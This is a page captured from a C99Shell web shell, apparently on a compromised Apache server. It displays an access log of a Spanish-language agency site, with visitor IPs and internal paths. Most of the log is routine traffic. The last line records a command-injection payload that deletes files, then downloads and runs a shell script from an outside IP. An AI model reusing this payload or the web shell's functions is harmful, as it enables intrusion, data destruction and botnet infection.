!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\apache\logs\   drwxrwxrwx
Free 9.41 GB of 239.26 GB (3.93%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     access.2024.02.19.log (12.7 MB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
172.22.2.4 - - [18/Feb/2024:23:59:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.115.132 - - [19/Feb/2024:00:01:30 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 40672
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33944
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33944
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
161.18.115.132 - - [19/Feb/2024:00:01:31 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1388
161.18.115.132 - - [19/Feb/2024:00:01:32 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
161.18.115.132 - - [19/Feb/2024:00:01:34 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5013
216.245.221.92 - - [19/Feb/2024:00:01:35 -0500] "HEAD / HTTP/1.1" 200 -
161.18.115.132 - - [19/Feb/2024:00:01:36 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 144436
161.18.115.132 - - [19/Feb/2024:00:01:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:37 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:37 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:37 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:01:40 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 137436
172.22.2.4 - - [19/Feb/2024:00:00:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
172.22.2.4 - - [19/Feb/2024:00:04:30 -0500] "GET /BLA/boletinlegal/jurisprudencia/analisis/ANALISIST-257-96.docx HTTP/1.1" 304 -
52.167.144.161 - - [19/Feb/2024:00:06:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/3033.pdf HTTP/1.1" 304 -
216.245.221.92 - - [19/Feb/2024:00:06:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:05:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
186.102.90.5 - - [19/Feb/2024:00:07:40 -0500] "GET /kwssiamovil/sm/ldap/au?x=U2FsdGVkX1+c3n45eZOW20yXurslUbd25nXO1jtNCvO9qaw9K8oNkDnTB5XqwSwh&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 30
186.102.90.5 - - [19/Feb/2024:00:07:40 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18a3JnTcNPMnX5OrR+a8Rbr/MeeyZ3WJzPUZq0fCbuBNfB9X3iZmNA+jJU1A8pEcveqXGwGq/tb2nsuRWeRsrg3cm9Wfa8WUSw=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 97
172.22.2.4 - - [19/Feb/2024:00:06:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60721
186.102.90.5 - - [19/Feb/2024:00:07:40 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX1+gHRNMoYPcedqpgKvHP6E1IWmbNsJc5SA2MBusvQCfaHOzp90jhC+9ppoer4JTsoxYqLh/7BZ/VxgyZhlvXtMgA+OQnK7l6spvoSrIvM0zWy9ZH6NTOQgSWMQ/GtJEZq+HbLvX771357TV5rgrv+4CCCcOZgADGF4uLTLJG7K692QDiU+ip4glXXmTRaTbSjux46EK2WguCr91onK3OEa4586ApCSr9gGwayVwNIbAybyrbMy9ubAlPIb3A8ziBc5TfYn+pjyZ84ap+0OvXtp5NqPsZ+WIP1qttl+NQ3o+7OvDd4PKgSWUqRBJF5xfQGlSZ89ld5AexqujEt1Ql4xKSCxO+LZDe4mG2XfO3WNslWFkwmSkKgdrqPh+Nb0VI/4IRKvSYKY+tNvsU/iYtpZF730Q13IZm/WLiR5mKP+bGffYp2lHj1ZEVBH6ELuCTKtUEuUYobVZSXoan30Lm7nXJKiG8pvVer4ivddWIHKsZXGsfJjLzwlea2BVc5suowMkRZMLgNXHEQsBPcFRscsGdDtOhjhWnJas2Kzctej4KiBg/ccZrd6jh8mj8W8uu2WwAmt1y2QBAfRs7SPSRqZ3irIlxqABY/Y8FVhz5hKQDlCiip0c0yHc+OpbX/IjrPTe2cnXMpj9HQAaD+kyJmLN/svG6I0bXxKnc+3qwjj/nO/VxKbpsU5y5tAMvkKkot62IQwLxHR6c6Wo1ymJzLFcNr3F7ogHZKVzKgsKKQjffYDM1j+RvzxAahw+u2RNlFhM+VzIaB0hiD6mDTY8jDt0+nqp4XWuG1y0Af4aTd0Qu/PrgbHGuYhydEDbvW312/C8qOMTwwMb4J9i60kYgK97BF+BvwPByXjPBtci7HzVWb8+rmadmOjAwhn4y73m5O9q9sbW17v6379dDxomPKC6XHZeGNBWrErr076mCFFRKxmgBe2AntWgQgP8TNCnuRhnd3eGpjDQtT7BAPx9cttzQk+9CaRqMXwwGog1Q44/Sn4fzOhSsK+WHIu2gkmKxLisjR8DeI/uJNLxbHN13lwQet96yt027iki464v0nbsHKKVw0ppN56JGdtjWSIHIybmwAX/xMwkiHiIZQDu5hrwF4kheKvFMtnAJQcZQVeKfnI50Mui53sn93xGn7hX/XdQRlBQ1Gq/CUgF+SlkcQBoS6AuafLpxVwSn0ZMzc9U7EUSzgIPUlPm6MvsiV1m3AEt+jLKhSupCggDpT9wnqWBoZ97Lothr4RMNBZa8sPizmBuKZB1j/9ybFeT8TDL9U3KQUSz7qpvg+WX7dQfsVFfif/tfr5mnNMQOxAKaLoZyOWHsQ3EsWKZNx96i1KPlWucGz4NDUF4WwgL8ujb5BsWNtSMpJ6B6GyI1Hx8HPIRiqlGWFJOnvEglx8P7+MIwXu0sskgYZEO8m8rrb6ZbQTCpyRmASJEMgY=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 2880
186.102.90.5 - - [19/Feb/2024:00:07:40 -0500] "GET /kwssiamovil/sm/acme/s?s=U2FsdGVkX18AnDCn9eFen1fllg1LbNQXhhgxnynorLk4sMsZWjVB0+zAiDHQ+gsYnwaJlzAkJP0WYmLqSjXFitM00XTbUh9ZOMlqsXwBD+rOn7f2AH1ge+EV78UDwRp3IHAph6JSNGQG9LNOv+uFU0ay1JopKHiR4b3pcuZ99H5tNsGajBsnaMBknYdOPmWUPQ6NwQ4qpltdi64qUPdWitjzYotxY2t8Par6BGyHLKLzHfqo1P8lTrIsOot+hU0T/oBZhod/iYG4YBD7WFvPsMpk7W3Ir+C0Y+YVdLZf7B/1md65rdwJpZ3duzbyyOPEvVb4OUp9jur9sFquaiT7IIKJj8BvFjgRwlJiR1tqGl8=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 196
186.102.90.5 - - [19/Feb/2024:00:07:40 -0500] "GET /kwssiamovil/sm/cjson/pre?f=1&x=U2FsdGVkX1+c3n45eZOW20yXurslUbd25nXO1jtNCvO9qaw9K8oNkDnTB5XqwSwh HTTP/1.1" 200 32032
66.249.66.20 - - [19/Feb/2024:00:07:50 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4326.pdf HTTP/1.1" 200 16200155
216.245.221.92 - - [19/Feb/2024:00:11:35 -0500] "HEAD / HTTP/1.1" 200 -
185.224.128.55 - - [19/Feb/2024:00:12:05 -0500] "GET / HTTP/1.1" 200 319
172.22.2.4 - - [19/Feb/2024:00:10:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:11:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.245.221.92 - - [19/Feb/2024:00:16:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:17:05 -0500] "GET /BLA/resoluciones/AUTOS%202021/1785.pdf HTTP/1.1" 200 422894
216.244.66.195 - - [19/Feb/2024:00:17:43 -0500] "GET /BLA/resoluciones/AUTOS%202021/1826.pdf HTTP/1.1" 200 367369
52.167.144.138 - - [19/Feb/2024:00:18:23 -0500] "GET /Publicaciones/2023EE247345.pdf HTTP/1.1" 404 228
216.244.66.195 - - [19/Feb/2024:00:18:25 -0500] "GET /BLA/resoluciones/AUTOS%202021/2050.pdf HTTP/1.1" 200 351458
172.22.2.4 - - [19/Feb/2024:00:16:49 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:18:59 -0500] "GET /BLA/resoluciones/AUTOS%202021/2129.pdf HTTP/1.1" 200 394464
201.245.192.253 - - [19/Feb/2024:00:19:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39112
172.22.2.4 - - [19/Feb/2024:00:17:40 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
201.245.192.253 - - [19/Feb/2024:00:19:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38169
201.245.192.253 - - [19/Feb/2024:00:19:32 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39137
216.244.66.195 - - [19/Feb/2024:00:19:49 -0500] "GET /BLA/resoluciones/AUTOS%202021/2137.pdf HTTP/1.1" 200 364479
52.167.144.138 - - [19/Feb/2024:00:19:57 -0500] "GET /sipse/faces/presentacion/sistema/anexos/cargarAnexoSolicitudProceso.xhtml HTTP/1.1" 302 -
52.167.144.138 - - [19/Feb/2024:00:19:58 -0500] "GET /sipse/faces/autenticacion.xhtml HTTP/1.1" 200 12403
201.245.192.253 - - [19/Feb/2024:00:19:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39137
216.244.66.195 - - [19/Feb/2024:00:20:34 -0500] "GET /BLA/resoluciones/AUTOS%202021/2154.pdf HTTP/1.1" 200 384516
216.244.66.195 - - [19/Feb/2024:00:21:13 -0500] "GET /BLA/resoluciones/AUTOS%202021/2339.pdf HTTP/1.1" 200 391413
216.245.221.92 - - [19/Feb/2024:00:21:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:21:55 -0500] "GET /BLA/resoluciones/AUTOS%202021/3923.pdf HTTP/1.1" 200 388390
216.244.66.195 - - [19/Feb/2024:00:22:26 -0500] "GET /BLA/resoluciones/AUTOS%202021/3924.pdf HTTP/1.1" 200 405901
216.244.66.195 - - [19/Feb/2024:00:23:06 -0500] "GET /BLA/resoluciones/AUTOS%202021/4181.pdf HTTP/1.1" 200 351166
186.102.90.5 - - [19/Feb/2024:00:23:20 -0500] "GET /kwssiamovil/sm/acme/u?s=U2FsdGVkX1/6rdQNETJc/I62pawn/b1pisuxkCDcODvEuBTne3uGVVwlMEolAgQZ6tXo49yDHGPis7OwTto53NXP7otgMwVFPFV6W1cpHTckoQrcJ9afFh0KgVFytNI29zBh70kaZK6XkjJ5syU9gZVLZ0poTSKlLcJwkSEImGQ=&u=U2FsdGVkX18kGOEC/LndOKJna9A8vHDYPMhRQd1ccb0=&y=U2FsdGVkX1/s3LNCeQWBZ2W1iRRvLxX64zjCh+r/22M+ZkUUhinTj4OjQcoauuEW HTTP/1.1" 200 60
52.167.144.194 - - [19/Feb/2024:00:23:43 -0500] "GET /autoliquidacion2020/Grupo%20Forestal%20-%20Silvicultura/Aplicativo.html HTTP/1.1" 200 359
216.244.66.195 - - [19/Feb/2024:00:23:47 -0500] "GET /BLA/resoluciones/AUTOS%202021/4401.pdf HTTP/1.1" 200 390435
216.244.66.195 - - [19/Feb/2024:00:24:18 -0500] "GET /BLA/resoluciones/AUTOS%202021/4436.pdf HTTP/1.1" 200 355601
172.22.2.4 - - [19/Feb/2024:00:22:39 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
40.77.167.68 - - [19/Feb/2024:00:24:30 -0500] "GET /documents/10184/4500877/calidaddeaire1.png/1b035ea7-b188-4f41-b7e9-9174f2beb346?t=1679613860556 HTTP/1.1" 404 1034
216.244.66.195 - - [19/Feb/2024:00:24:54 -0500] "GET /BLA/resoluciones/AUTOS%202021/4573.pdf HTTP/1.1" 200 360676
172.22.2.4 - - [19/Feb/2024:00:23:30 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 54291
216.244.66.195 - - [19/Feb/2024:00:25:30 -0500] "GET /BLA/resoluciones/AUTOS%202021/4578.pdf HTTP/1.1" 200 346315
216.244.66.195 - - [19/Feb/2024:00:26:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/5042.pdf HTTP/1.1" 200 349239
172.22.2.4 - - [19/Feb/2024:00:24:37 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 60371
216.244.66.195 - - [19/Feb/2024:00:26:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/5376.pdf HTTP/1.1" 200 394768
216.245.221.92 - - [19/Feb/2024:00:26:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:27:03 -0500] "GET /BLA/resoluciones/AUTOS%202021/0681.pdf HTTP/1.1" 200 338024
216.244.66.195 - - [19/Feb/2024:00:27:33 -0500] "GET /BLA/resoluciones/AUTOS%202021/1976.pdf HTTP/1.1" 200 2704702
216.244.66.195 - - [19/Feb/2024:00:28:16 -0500] "GET /BLA/resoluciones/AUTOS%202021/2987.pdf HTTP/1.1" 200 851750
216.244.66.195 - - [19/Feb/2024:00:28:48 -0500] "GET /BLA/resoluciones/AUTOS%202021/3825.pdf HTTP/1.1" 200 917960
201.245.192.253 - - [19/Feb/2024:00:29:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39112
216.244.66.195 - - [19/Feb/2024:00:29:19 -0500] "GET /BLA/resoluciones/AUTOS%202021/4134.pdf HTTP/1.1" 200 645709
201.245.192.253 - - [19/Feb/2024:00:29:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38169
201.245.192.253 - - [19/Feb/2024:00:29:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39137
216.244.66.195 - - [19/Feb/2024:00:29:57 -0500] "GET /BLA/resoluciones/AUTOS%202023/1988.pdf HTTP/1.1" 200 396748
201.245.192.253 - - [19/Feb/2024:00:29:58 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39137
172.22.2.4 - - [19/Feb/2024:00:28:29 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:30:28 -0500] "GET /BLA/resoluciones/AUTOS%202023/2071.pdf HTTP/1.1" 200 406916
172.22.2.4 - - [19/Feb/2024:00:29:20 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
216.244.66.195 - - [19/Feb/2024:00:31:00 -0500] "GET /BLA/resoluciones/AUTOS%202023/2424.pdf HTTP/1.1" 200 1916442
216.245.221.92 - - [19/Feb/2024:00:31:35 -0500] "HEAD / HTTP/1.1" 200 -
216.244.66.195 - - [19/Feb/2024:00:31:37 -0500] "GET /BLA/resoluciones/AUTOS%202023/3310.pdf HTTP/1.1" 200 870271
52.167.144.180 - - [19/Feb/2024:00:32:26 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202023/02480.pdf HTTP/1.1" 200 472531
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 34307
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
161.18.115.132 - - [19/Feb/2024:00:35:55 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 27619
161.18.115.132 - - [19/Feb/2024:00:35:56 -0500] "POST /sipse/faces/presentacion/sistema/reporte/listarReportes.xhtml HTTP/1.1" 200 40511
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33783
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33783
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33783
161.18.115.132 - - [19/Feb/2024:00:35:57 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33783
161.18.115.132 - - [19/Feb/2024:00:35:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 33783
161.18.115.132 - - [19/Feb/2024:00:35:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1392
161.18.115.132 - - [19/Feb/2024:00:35:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1388
161.18.115.132 - - [19/Feb/2024:00:35:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
161.18.115.132 - - [19/Feb/2024:00:35:58 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1388
161.18.115.132 - - [19/Feb/2024:00:35:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1400
161.18.115.132 - - [19/Feb/2024:00:35:59 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 1384
172.22.2.4 - - [19/Feb/2024:00:34:19 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
161.18.115.132 - - [19/Feb/2024:00:36:02 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31929
161.18.115.132 - - [19/Feb/2024:00:36:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31925
161.18.115.132 - - [19/Feb/2024:00:36:03 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 31729
161.18.115.132 - - [19/Feb/2024:00:36:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 25589
161.18.115.132 - - [19/Feb/2024:00:36:05 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 25597
161.18.115.132 - - [19/Feb/2024:00:36:08 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5118
161.18.115.132 - - [19/Feb/2024:00:36:09 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 5126
161.18.115.132 - - [19/Feb/2024:00:36:11 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/listarSolicitudProceso.xhtml HTTP/1.1" 200 154973
161.18.115.132 - - [19/Feb/2024:00:36:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:36:12 -0500] "GET /sipse/faces/javax.faces.resource/jquery/jquery-plugins.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:36:12 -0500] "GET /sipse/faces/javax.faces.resource/primefaces.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:36:12 -0500] "GET /sipse/faces/javax.faces.resource/layout/layout.js?ln=primefaces&v=4.0 HTTP/1.1" 304 -
161.18.115.132 - - [19/Feb/2024:00:36:26 -0500] "POST /sipse/faces/presentacion/financiero/solicitudProceso/consultarSolicitudProceso.xhtml HTTP/1.1" 200 144876
172.22.2.4 - - [19/Feb/2024:00:35:52 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [19/Feb/2024:00:36:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:35:10 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 57127
40.77.167.38 - - [19/Feb/2024:00:37:48 -0500] "GET /bla/resoluciones/resoluciones%202007/res%202007%204101%20al%204200/RESOLUCION%204111%20DE%202007.pdf HTTP/1.1" 200 832966
216.244.66.195 - - [19/Feb/2024:00:38:02 -0500] "GET /robots.txt HTTP/1.1" 404 1018
172.22.2.4 - - [19/Feb/2024:00:38:20 -0500] "GET /BLA/boletinlegal/actos.php HTTP/1.1" 200 9738
172.22.2.4 - - [19/Feb/2024:00:38:21 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [19/Feb/2024:00:38:21 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [19/Feb/2024:00:38:21 -0500] "GET /BLA/boletinlegal/js/ajax_actos.js HTTP/1.1" 200 1322
172.22.2.4 - - [19/Feb/2024:00:38:22 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
201.245.192.253 - - [19/Feb/2024:00:39:10 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39112
201.245.192.253 - - [19/Feb/2024:00:39:29 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 38169
201.245.192.253 - - [19/Feb/2024:00:39:31 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39137
52.167.144.198 - - [19/Feb/2024:00:39:58 -0500] "GET /Publicaciones/2023EE305165.pdf HTTP/1.1" 404 228
201.245.192.253 - - [19/Feb/2024:00:39:59 -0500] "POST /kwsrmcab/Wsrmcab HTTP/1.1" 200 39137
172.22.2.4 - - [19/Feb/2024:00:40:07 -0500] "GET /BLA/boletinlegal/robots.txt HTTP/1.1" 404 1038
216.245.221.92 - - [19/Feb/2024:00:41:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:40:09 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:41:00 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 59074
40.77.167.70 - - [19/Feb/2024:00:43:47 -0500] "GET /BLA/resoluciones/RESOLUCIONES%202009/4950.pdf HTTP/1.1" 200 465068
172.22.2.4 - - [19/Feb/2024:00:44:10 -0500] "GET /BLA/boletinlegal/favicon.ico HTTP/1.1" 404 1018
172.22.2.4 - - [19/Feb/2024:00:46:23 -0500] "GET /BLA/boletinlegal/jurisprudencia.php HTTP/1.1" 200 17637
172.22.2.4 - - [19/Feb/2024:00:45:49 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 24523
216.245.221.92 - - [19/Feb/2024:00:46:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:46:42 -0500] "GET /BLA/boletinlegal/js/jquery1.js HTTP/1.1" 200 29846
172.22.2.4 - - [19/Feb/2024:00:46:42 -0500] "GET /BLA/boletinlegal/js/popup.js HTTP/1.1" 200 1270
172.22.2.4 - - [19/Feb/2024:00:46:46 -0500] "GET /BLA/boletinlegal/js/lib.js HTTP/1.1" 200 6474
172.22.2.4 - - [19/Feb/2024:00:45:59 -0500] "HEAD /BLA/boletinlegal/ HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:46:50 -0500] "GET /BLA/boletinlegal/ HTTP/1.1" 200 53809
172.22.2.4 - - [19/Feb/2024:00:48:53 -0500] "GET /BLA/boletinlegal/geoserver/web/ HTTP/1.1" 404 1018
172.22.2.4 - - [19/Feb/2024:00:50:06 -0500] "GET /BLA/boletinlegal/.git/config HTTP/1.1" 404 1018
209.141.42.209 - - [19/Feb/2024:00:50:20 -0500] "GET / HTTP/1.1" 200 319
40.77.167.32 - - [19/Feb/2024:00:51:12 -0500] "GET /portaldeninos/wp-content/uploads/2021/07/Banners-p%C3%A1gina-de-ni%C3%B1os7.jpg HTTP/1.1" 404 75240
216.245.221.92 - - [19/Feb/2024:00:51:35 -0500] "HEAD / HTTP/1.1" 200 -
172.22.2.4 - - [19/Feb/2024:00:52:28 -0500] "GET /BLA/boletinlegal/cgi-bin/luci/;stok=/locale?form=country&operation=write&country=$(rm%20-rf%20%2A%3B%20cd%20%2Ftmp%3B%20wget%20http%3A%2F%2F204.76.203.111%2Ftenda.sh%3B%20chmod%20777%20tenda.sh%3B%20.%2Ftenda.sh) HTTP/1.1" 404 1018
